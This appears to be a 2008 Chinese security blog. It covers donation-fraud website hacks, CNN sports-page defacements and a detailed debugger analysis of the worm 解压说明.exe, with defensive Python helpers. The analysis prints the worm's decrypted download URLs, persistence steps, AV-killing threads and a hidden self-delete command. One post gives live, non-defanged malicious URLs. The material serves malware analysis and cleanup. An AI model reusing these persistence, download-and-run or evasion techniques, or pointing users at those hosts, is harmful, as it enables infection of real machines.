Mainland China's Sichuan province has been hit by a strong earthquake with heavy losses, and people everywhere have been donating generously. However, mainland public security authorities have confirmed that some official "Red Cross" websites were broken into by hackers, who replaced the bank account numbers shown on the pages soliciting public donations in order to commit fraud. The authorities have issued urgent notices to all regions, urging the public to stay alert.
The Ningbo banking regulatory bureau said that after receiving the urgent notice it used the mass media to publish the dedicated account numbers for disaster-relief donations, and it repeatedly reminded the public to check the account number carefully before remitting relief funds, or to ask bank counter staff to help verify it. The practical point is that a number shown on a website that may itself be compromised is not a trustworthy source; confirm it through an independent channel such as the bank's published list or the counter.
Source: BCC News (中广新闻网)
Posted by GreySign on 17 May 2008 in Default (no comments)
The "Wanrenmi" (万人迷) remote video forced-sniffing page (http://www.gooton.cn/cf.asp?user_name=rzz123) injects malicious code loaded from: http://fanduizd.cn/wmpu/1810.htm?5918
Posted by GreySign on 03 May 2008 in Default (no comments)
The Sports Network website and other major news sites have been hacked by a political entity from China, and as a result are temporarily unavailable. We apologize for any inconvenience and hope to be back up and running as soon as possible. Thank you for your patience and understanding.
Sports Network Management
From following this over the past few days: the CNN sports site had an obvious injection vulnerability, and one person after another obtained access through it and defaced its pages. CNN's administrators also restored things very quickly, generally within 20 minutes a defaced page was back to normal, but some of the hackers still left footprints and their handles behind.
Today the CNN sports site has published a statement and temporarily shut down, which is clearly connected to the intrusions and defacements of the past few days.
Posted by GreySign on 21 Apr 2008 in Default (no comments)
2008-4-20 15:17
http://sports.si.cnn.com/
The homepage has been defaced by hackers again.
——————————————
2008-4-20 14:50
The defacement page is at:
http://sports.si.cnn.com/homehacked.asp
2008-04-20 14:22:17
http://sports.si.cnn.com/
Quote (the defacement text was posted bilingually; the English lines as they appeared):
Tibet WAS, IS, and ALWAYS WILL BE a part of China!
We are not against the western media, but against the lies and fabricated stories in the media.
We are not against the western people, but against the prejudice from the western society.
Posted by GreySign on 20 Apr 2008 in Default (no comments)
More and more malware watches window titles in order to stop the user from running particular programs or opening certain kinds of websites. If your window keeps getting closed for no apparent reason while you are searching for an antivirus tool, there is a good chance the machine is infected.
Re-releasing a small tool I wrote a long time ago: the Title Protector (标题保护器).
You can choose how often it automatically rewrites the current window's title, in milliseconds, or simply rewrite the titles of all windows at once.
That keeps your window titles from being recognised by the malware. Note that this only defeats title-based matching; malware that identifies its targets by process name or image path is not affected, so treat the tool as a way to get an AV download or scan started, not as a cure.
It helps you fight malware such as the "磁碟机" (Disk Drive) worm.
Download: http://www.scanw.com/btbhq.exe
Posted by GreySign on 21 Mar 2008 in Default (no comments)
Sample: http://www.scanw.com/blog/archives/77 (解压说明.exe, "extraction instructions")
;*****************************************************************************************
;**********************************thanks cyto******************************************
;*****************************************************************************************
1. OEP
The OEP has been tampered with. The entry point (EP) now starts with a junk sled of push/pop, inc/dec and nop pairs that does nothing and then jumps away:
004115A1 > $ 55 push ebp
004115A2 . 8BEC mov ebp,esp
004115A4 . 50 push eax
004115A5 . 58 pop eax
004115A6 . 90 nop
004115A7 . 90 nop
004115A8 . 41 inc ecx
004115A9 . 49 dec ecx
004115AA . 90 nop
004115AB . 90 nop
004115AC . 50 push eax
004115AD . 58 pop eax
004115AE . 90 nop
004115AF . 90 nop
004115B0 . 90 nop
004115B1 . 90 nop
004115B2 . EB 29 jmp short 解压说明.004115DD
Further down is the Borland Delphi OEP signature (55 8B EC B9 34 00 00 00), followed by a jmp back into the original code:
004115B8 > /55 push ebp
004115B9 . |8BEC mov ebp,esp
004115BB . |B9 34000000 mov ecx,34
004115C0 .^|E9 8BEEFFFF jmp 解压说明.00410450
This is the fOEP, the jmp target:
00410450 > /6A 00 push 0 ; fOEP
00410452 . |6A 00 push 0
00410454 . |49 dec ecx
00410455 .^ 75 F9 jnz short 解压说明.00410450
00410457 . |51 push ecx
00410458 . |53 push ebx
The eight bytes immediately before 00410450 (at 00410448) have been overwritten with NOPs, and the push 0 / push 0 / dec ecx / jnz loop that follows is the Delphi stack-clearing loop that normally comes right after mov ecx,N. Patch the prologue back in at 00410448:
55 8B EC B9 34 00 00 00
With that, 00410448 is the original Delphi OEP again. Fixed.
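The repair in step 1 can be scripted. The following is an added example, not code from the original post: it reproduces the bytes from the listing above in a constructed buffer (the junk stub at 004115A1, the moved prologue and jmp at 004115B8, the NOP hole at 00410448 and the zero-push loop at 00410450; everything else is filler, not a dump of the real sample), locates the relocated Delphi prologue by signature, follows its jmp, checks that the eight bytes before the target are NOPs and that the target is the push 0 / push 0 / dec ecx / jnz loop, and copies the prologue back. A load address of 00410000 for the buffer is an assumption made for the example; on a real file you would map RVA to file offset through the section table first.

```python
import re
import struct

# Added example (not from the original post). Undo the OEP trick seen in
# 解压说明.exe: the first eight bytes of the Delphi prologue were moved into
# a stub that ends with a jmp back to the zero-push loop, and the original
# location was filled with NOPs.

# push ebp / mov ebp,esp / mov ecx,imm32 (imm < 256) / jmp rel32
RELOCATED_PROLOGUE = re.compile(rb"\x55\x8b\xec\xb9(.)\x00\x00\x00\xe9(.{4})", re.DOTALL)
# push 0 / push 0 / dec ecx / jnz $-7  (Delphi stack-clearing loop)
ZERO_LOOP = b"\x6a\x00\x6a\x00\x49\x75\xf9"
NOP_HOLE = b"\x90" * 8


def restore_delphi_oep(image: bytearray, base: int) -> int:
    """Patch the NOPed prologue back in place; return the restored OEP VA."""
    for m in RELOCATED_PROLOGUE.finditer(image):
        prologue = bytes(m.group(0)[:8])
        rel32 = struct.unpack("<i", m.group(2))[0]
        target = base + m.end() + rel32          # jmp destination (VA)
        loop_off = target - base                 # offset of the push-0 loop
        hole_off = loop_off - len(NOP_HOLE)      # where the prologue belongs
        if hole_off < 0 or loop_off + len(ZERO_LOOP) > len(image):
            continue
        if image[hole_off:loop_off] != NOP_HOLE:
            continue                             # no NOP hole: not our case
        if image[loop_off:loop_off + len(ZERO_LOOP)] != ZERO_LOOP:
            continue                             # target is not the loop
        image[hole_off:loop_off] = prologue
        return target - len(NOP_HOLE)
    raise ValueError("no relocated Delphi prologue with a NOP hole found")


def build_sample():
    """Constructed buffer mirroring the post's listing. Hypothetical load
    address 00410000; only the four patched regions are real bytes."""
    base = 0x00410000
    img = bytearray(b"\xcc" * 0x12000)

    def put(va, data):
        img[va - base:va - base + len(data)] = data

    put(0x004115A1, bytes.fromhex("558bec5058909041499090505890909090eb29"))  # junk EP
    put(0x004115B8, bytes.fromhex("558becb934000000e98beeffff"))              # moved prologue + jmp 00410450
    put(0x00410448, NOP_HOLE)                                                  # where the prologue was
    put(0x00410450, bytes.fromhex("6a006a004975f95153"))                       # push 0/push 0/dec ecx/jnz/push ecx/push ebx
    return img, base


if __name__ == "__main__":
    img, base = build_sample()
    oep = restore_delphi_oep(img, base)
    print(f"restored OEP = {oep:08X}, bytes = {img[oep - base:oep - base + 8].hex()}")
```

The check is deliberately strict: both the NOP hole and the loop must match before anything is written, so a prologue that was never moved is left alone. On a real file, after writing the bytes back you also point AddressOfEntryPoint in the PE header at the restored OEP; the example only rewrites the buffer.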
2. String decryption: 004104C1 E8 8E7DFFFF call 解压说明.00408254, which in turn calls 0040654C. Each call takes the obfuscated string in edx and leaves the decrypted URL on the stack:
Stack ss:[0012D578]=00C8290C, (ASCII "hxxp://www.webweb.com/ReadDown.txt")
edx=00C828A8, (ASCII "mvqr?-*uru+u``rgg,fmh-WgdfAmrl+v}v")
Stack ss:[0012D568]=00C829C0, (ASCII "hxxp://www.cbirds.cn/qqwww/uu.exe")
edx=00C82970, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*wp,`z`")
Stack ss:[0012D560]=00C82A40, (ASCII "hxxp://www.cbirds.cn/qqwww/1.exe")
edx=00C829F0, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*3+g}g")
Stack ss:[0012D558]=00C82AC0, (ASCII "hxxp://www.cbirds.cn/qqwww/2.exe")
edx=00C82A70, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*0+g}g")
Stack ss:[0012D550]=00C82B40, (ASCII "hxxp://www.cbirds.cn/qqwww/3.exe")
edx=00C82AF0, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*1+g}g")
Stack ss:[0012D520]=00C82D50, (ASCII "hxxp://www.cbirds.cn/qqwww/4.exe")
edx=00C82CEC, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*6+g}g")
Stack ss:[0012D518]=00C82DE4, (ASCII "hxxp://www.cbirds.cn/qqwww/5.exe")
edx=00C82D80, (ASCII "mvqr?-*uru+agkwfv,fl*sturu*7+g}g")
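The obfuscation is simple enough to reverse from the pairs alone. The decoder below is an added example; it is not the malware's routine at 00408254/0040654C and not code from the original post. Comparing each edx string with the URL that ends up on the stack shows every byte at an even offset XORed with 0x05 and every byte at an odd offset XORed with 0x02, consistently across all seven pairs (in the first pair the page collapsed two consecutive backticks into one quote character). The key is an inference from those pairs, not a constant recovered from the code, so treat it as a fit to the observed data. Output is defanged the way the post writes its URLs.

```python
# Added example (not from the original post): decoder for the string
# obfuscation observed in 解压说明.exe. The alternating key below is
# inferred from the ciphertext/plaintext pairs listed in the analysis,
# not lifted from the binary.
KEY = (0x05, 0x02)  # even offsets ^ 0x05, odd offsets ^ 0x02 (inferred)


def decode(obf: str) -> str:
    """Recover the plaintext: byte i is XORed with KEY[i % 2]."""
    return "".join(chr(ord(c) ^ KEY[i % 2]) for i, c in enumerate(obf))


def encode(plain: str) -> str:
    """XOR is an involution, so the same transform re-obfuscates."""
    return decode(plain)


def defang(url: str) -> str:
    """Write a decoded URL the way the post does (http -> hxxp)."""
    return url.replace("http://", "hxxp://", 1)


# Constructed copy of the edx values from the listing (first entry with the
# two backticks the page rendered as a single quote restored).
SAMPLES = [
    "mvqr?-*uru+u``rgg,fmh-WgdfAmrl+v}v",
    "mvqr?-*uru+agkwfv,fl*sturu*wp,`z`",
    "mvqr?-*uru+agkwfv,fl*sturu*3+g}g",
    "mvqr?-*uru+agkwfv,fl*sturu*0+g}g",
    "mvqr?-*uru+agkwfv,fl*sturu*1+g}g",
    "mvqr?-*uru+agkwfv,fl*sturu*6+g}g",
    "mvqr?-*uru+agkwfv,fl*sturu*7+g}g",
]


def decode_all(samples=SAMPLES):
    """Decode every sample and defang it for reporting."""
    return [defang(decode(s)) for s in samples]


if __name__ == "__main__":
    for obf, url in zip(SAMPLES, decode_all()):
        print(f"{obf!r:40} -> {url}")
```

Because the key is two bytes long, a single known prefix ("http") is enough to recover it from any other string this family drops, which is the usual shortcut when a sample carries more strings than the debugger session happened to hit.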
3. Checks whether the running process's own name is GOODIYA.EXE:
00410518 8B55 E0 mov edx,dword ptr ss:[ebp-20]
0041051B 58 pop eax
0041051C E8 C338FFFF call 解压说明.00403DE4
00410521 0F85 A5010000 jnz 解压说明.004106CC
It goes through the partitions one by one:
Stack ss:[0012FF98]=00C82FEC, (ASCII "C:\GOODIYA.EXE")
…
Stack ss:[0012FF98]=00C8375C, (ASCII "Z:\GOODIYA.EXE")
If it matches, it simply runs on directly.
4. Compares whether the process is one of the following programs:
004107EB 8B55 88 mov edx,dword ptr ss:[ebp-78]
004107EE 58 pop eax
004107EF E8 F035FFFF call 解压说明.00403DE4
004107F4 0F84 16060000 je 解压说明.00410E10
C:\PROGRAM FILES\COMMON FILES\SYSTEM\PJNQBQE.EXE
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\MAUJQYF.EXE
If not, it copies itself to both locations:
0012FDEC 00410CCD /CALL to CopyFileA from 解压说明.00410CC8
0012FDF0 00C80034 |ExistingFileName = "C:\Documents and Settings\gao1\桌面\解压说明.exe"
0012FDF4 00C80480 |NewFileName = "C:\Program Files\Common Files\System\pjnqbqe.exe"
0012FDF8 FFFFFFFF \FailIfExists = TRUE
0012FDEC 00410D17 /CALL to CopyFileA from 解压说明.00410D12
0012FDF0 00C80034 |ExistingFileName = "C:\Documents and Settings\gao1\桌面\解压说明.exe"
0012FDF4 00C80514 |NewFileName = "C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe"
0012FDF8 FFFFFFFF \FailIfExists = TRUE
and runs them:
0012FDF0 00410D54 /CALL to WinExec from 解压说明.00410D4F
0012FDF4 00C805A8 |CmdLine = "C:\Program Files\Common Files\System\pjnqbqe.exe"
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
0012FDF0 00410D91 /CALL to WinExec from 解压说明.00410D8C
0012FDF4 00C8063C |CmdLine = "C:\Program Files\Common Files\Microsoft Shared\maujqyf.exe"
0012FDF8 00000001 \ShowState = SW_SHOWNORMAL
Then it deletes itself through a hidden cmd.exe (unless it is the GOODIYA.EXE in a drive root):
0012FCC8 00405FA9 /CALL to WinExec from 解压说明.00405FA4
0012FCCC 00C83D80 |CmdLine = "C:\WINNT\system32\cmd.exe /c del "C:\Documents and Settings\gao1\桌面\解压说明.exe""
0012FCD0 00000000 \ShowState = SW_HIDE
5. What PJNQBQE.EXE and MAUJQYF.EXE do:
5.1 If running as PJNQBQE.EXE:
0012FDE0 00411025 /CALL to CreateThread from 解压说明.00411020
0012FDE4 00000000 |pSecurity = NULL
0012FDE8 00000000 |StackSize = 0
0012FDEC 0040BDE0 |ThreadFunction = 解压说明.0040BDE0 ; deals with avp (Kaspersky)
0012FDF0 00000000 |pThreadParm = NULL
0012FDF4 00000000 |CreationFlags = 0
0012FDF8 004136DC \pThreadId = 解压说明.004136DC
0012FDE8 00411038 /CALL to SetTimer from 解压说明.00411033
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000514 |Timeout = 1300. ms
0012FDF8 0040FBC4 \Timerproc = 解压说明.0040FBC4 ; writes the registry
0040FDA4=解压说明.0040FDA4 (ASCII "Software\Microsoft\Windows\CurrentVersion\Run")
0012FDE8 00411053 /CALL to SetTimer from 解压说明.0041104E
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00001388 |Timeout = 5000. ms
0012FDF8 00410078 \Timerproc = 解压说明.00410078 ; writes autorun.inf and GOODIYA.EXE
0012FDE8 0041106E /CALL to SetTimer from 解压说明.00411069
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000898 |Timeout = 2200. ms
0012FDF8 00410090 \Timerproc = 解压说明.00410090 ; defeats a pile of AV products
0012FDE8 004110A4 /CALL to SetTimer from 解压说明.0041109F
0012FDEC 00000000 |hWnd = NULL
0012FDF0 00000000 |TimerID = 0
0012FDF4 00000000 |Timeout = 0. ms
0012FDF8 0040B8E4 \Timerproc = 解压说明.0040B8E4 ; downloads the malware
Because these are repeating timers rather than one-shot writes, deleting the Run value or the autorun.inf while the process is alive only buys a few seconds; the process has to be stopped first.
5.2 If running as MAUJQYF.EXE:
004112EF A1 3C254100 mov eax,dword ptr ds:[41253C]
004112F4 50 push eax
004112F5 6A 00 push 0
004112F7 6A 00 push 0
004112F9 68 9CF34000 push 解压说明.0040F39C ; defeats AV
004112FE 6A 00 push 0
00411300 6A 00 push 0
00411302 E8 B533FFFF call <jmp.&kernel32.CreateThread>
00411307 A1 44254100 mov eax,dword ptr ds:[412544]
0041130C 50 push eax
0041130D 6A 00 push 0
0041130F 6A 00 push 0
00411311 68 04B24000 push 解压说明.0040B204 ; downloads files, runs them, then deletes them
00411316 6A 00 push 0
00411318 6A 00 push 0
0041131A E8 9D33FFFF call <jmp.&kernel32.CreateThread>
It downloads from the addresses decrypted above one by one, for example:
011DFF60 00C84050 ASCII "hxxp://www.cbirds.cn/qqwww/uu.exe"
011DFF64 00C80210 ASCII "C:\Program Files\1Awww.cbirds.cn/qqwww/uu.exe"
0041131F 68 28FE4000 push 解压说明.0040FE28 ; runs PJNQBQE.EXE and closes the taskmgr.exe window
00411324 68 14050000 push 514
00411329 6A 00 push 0
0041132B 6A 00 push 0
0041132D E8 FA34FFFF call <jmp.&user32.SetTimer>
00411332 8B15 40254100 mov edx,dword ptr ds:[412540] ; 解压说明.00413ED0
00411338 8902 mov dword ptr ds:[edx],eax
0041133A 68 6C004100 push 解压说明.0041006C ; writes autorun.inf and GOODIYA.EXE to every partition
0041133F 68 70170000 push 1770
00411344 6A 00 push 0
00411346 6A 00 push 0
00411348 E8 DF34FFFF call <jmp.&user32.SetTimer>
0041134D 8B15 50254100 mov edx,dword ptr ds:[412550] ; 解压说明.00413ED4
00411353 8902 mov dword ptr ds:[edx],eax
00411355 68 60034100 push 解压说明.00410360 ; defeats AV
0041135A 68 E8030000 push 3E8
0041135F 6A 00 push 0
00411361 6A 00 push 0
00411363 E8 C434FFFF call <jmp.&user32.SetTimer>
The two copies back each other up: each one restarts the other and re-drops the autorun.inf/GOODIYA.EXE pair on a timer, so cleanup has to kill both processes before removing pjnqbqe.exe, maujqyf.exe, the Run value and every X:\GOODIYA.EXE plus its autorun.inf.
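The propagation step, writing autorun.inf plus GOODIYA.EXE into every drive root, is the one a responder most often has to check by hand on removable media. The checker below is an added example, not code from the original post: the post does not show the dropped autorun.inf, so the sample file is constructed and only the GOODIYA.EXE name comes from the analysis. It parses an autorun.inf tolerantly (mixed case, spaces around "=", shell\...\command keys), collects every value that Windows could execute from it, and flags those that launch an executable actually present in the drive root.

```python
import re

# Added example (not from the original post): flag autorun.inf files that
# launch an executable sitting in the same drive root, the pattern used by
# the worm analysed above (autorun.inf + GOODIYA.EXE in every partition).

LAUNCH_KEYS = {"open", "shellexecute"}           # keys Windows may execute directly
CMD_KEY = re.compile(r"^shell\\[^\\]+\\command$")  # shell\<verb>\command=...


def parse_autorun(text):
    """Return {(section, key): value}; sections and keys lower-cased.
    Tolerant on purpose: Windows accepts odd casing and spacing, so a
    strict parser would miss exactly the files that matter."""
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if "=" in line and section is not None:
            key, _, value = line.partition("=")
            entries[(section, key.strip().lower())] = value.strip()
    return entries


def launch_commands(text):
    """Every command Windows could run from this autorun.inf, in file order."""
    cmds = []
    for (section, key), value in parse_autorun(text).items():
        if section != "autorun":
            continue
        if key in LAUNCH_KEYS or CMD_KEY.match(key):
            cmds.append(value)
    return cmds


def suspicious(text, root_files):
    """Commands that start an .exe present in the drive root.
    root_files: file names found in the root directory (constructed here)."""
    names = {n.lower() for n in root_files}
    hits = []
    for cmd in launch_commands(text):
        parts = cmd.strip('"').split()
        if not parts:
            continue
        exe = parts[0].split("\\")[-1].lower()   # strip any path prefix
        if exe.endswith(".exe") and exe in names:
            hits.append(cmd)
    return hits


# Constructed autorun.inf; only the GOODIYA.EXE name comes from the analysis.
SAMPLE_AUTORUN = """\
[AutoRun]
OPEN = GOODIYA.EXE
shell\\open\\Command=GOODIYA.EXE
shellexecute=goodiya.exe
icon=%SystemRoot%\\system32\\SHELL32.dll,4
"""

if __name__ == "__main__":
    for cmd in suspicious(SAMPLE_AUTORUN, ["autorun.inf", "GOODIYA.EXE", "docs"]):
        print("would launch:", cmd)
```

The icon= line is deliberately ignored: it is the usual decoy that makes the drive look like a normal device, and only open, shellexecute and shell\<verb>\command lead to code execution. On a live system the file-name list would come from listing the drive root, and the same check should be run against each partition, since the worm writes to all of them.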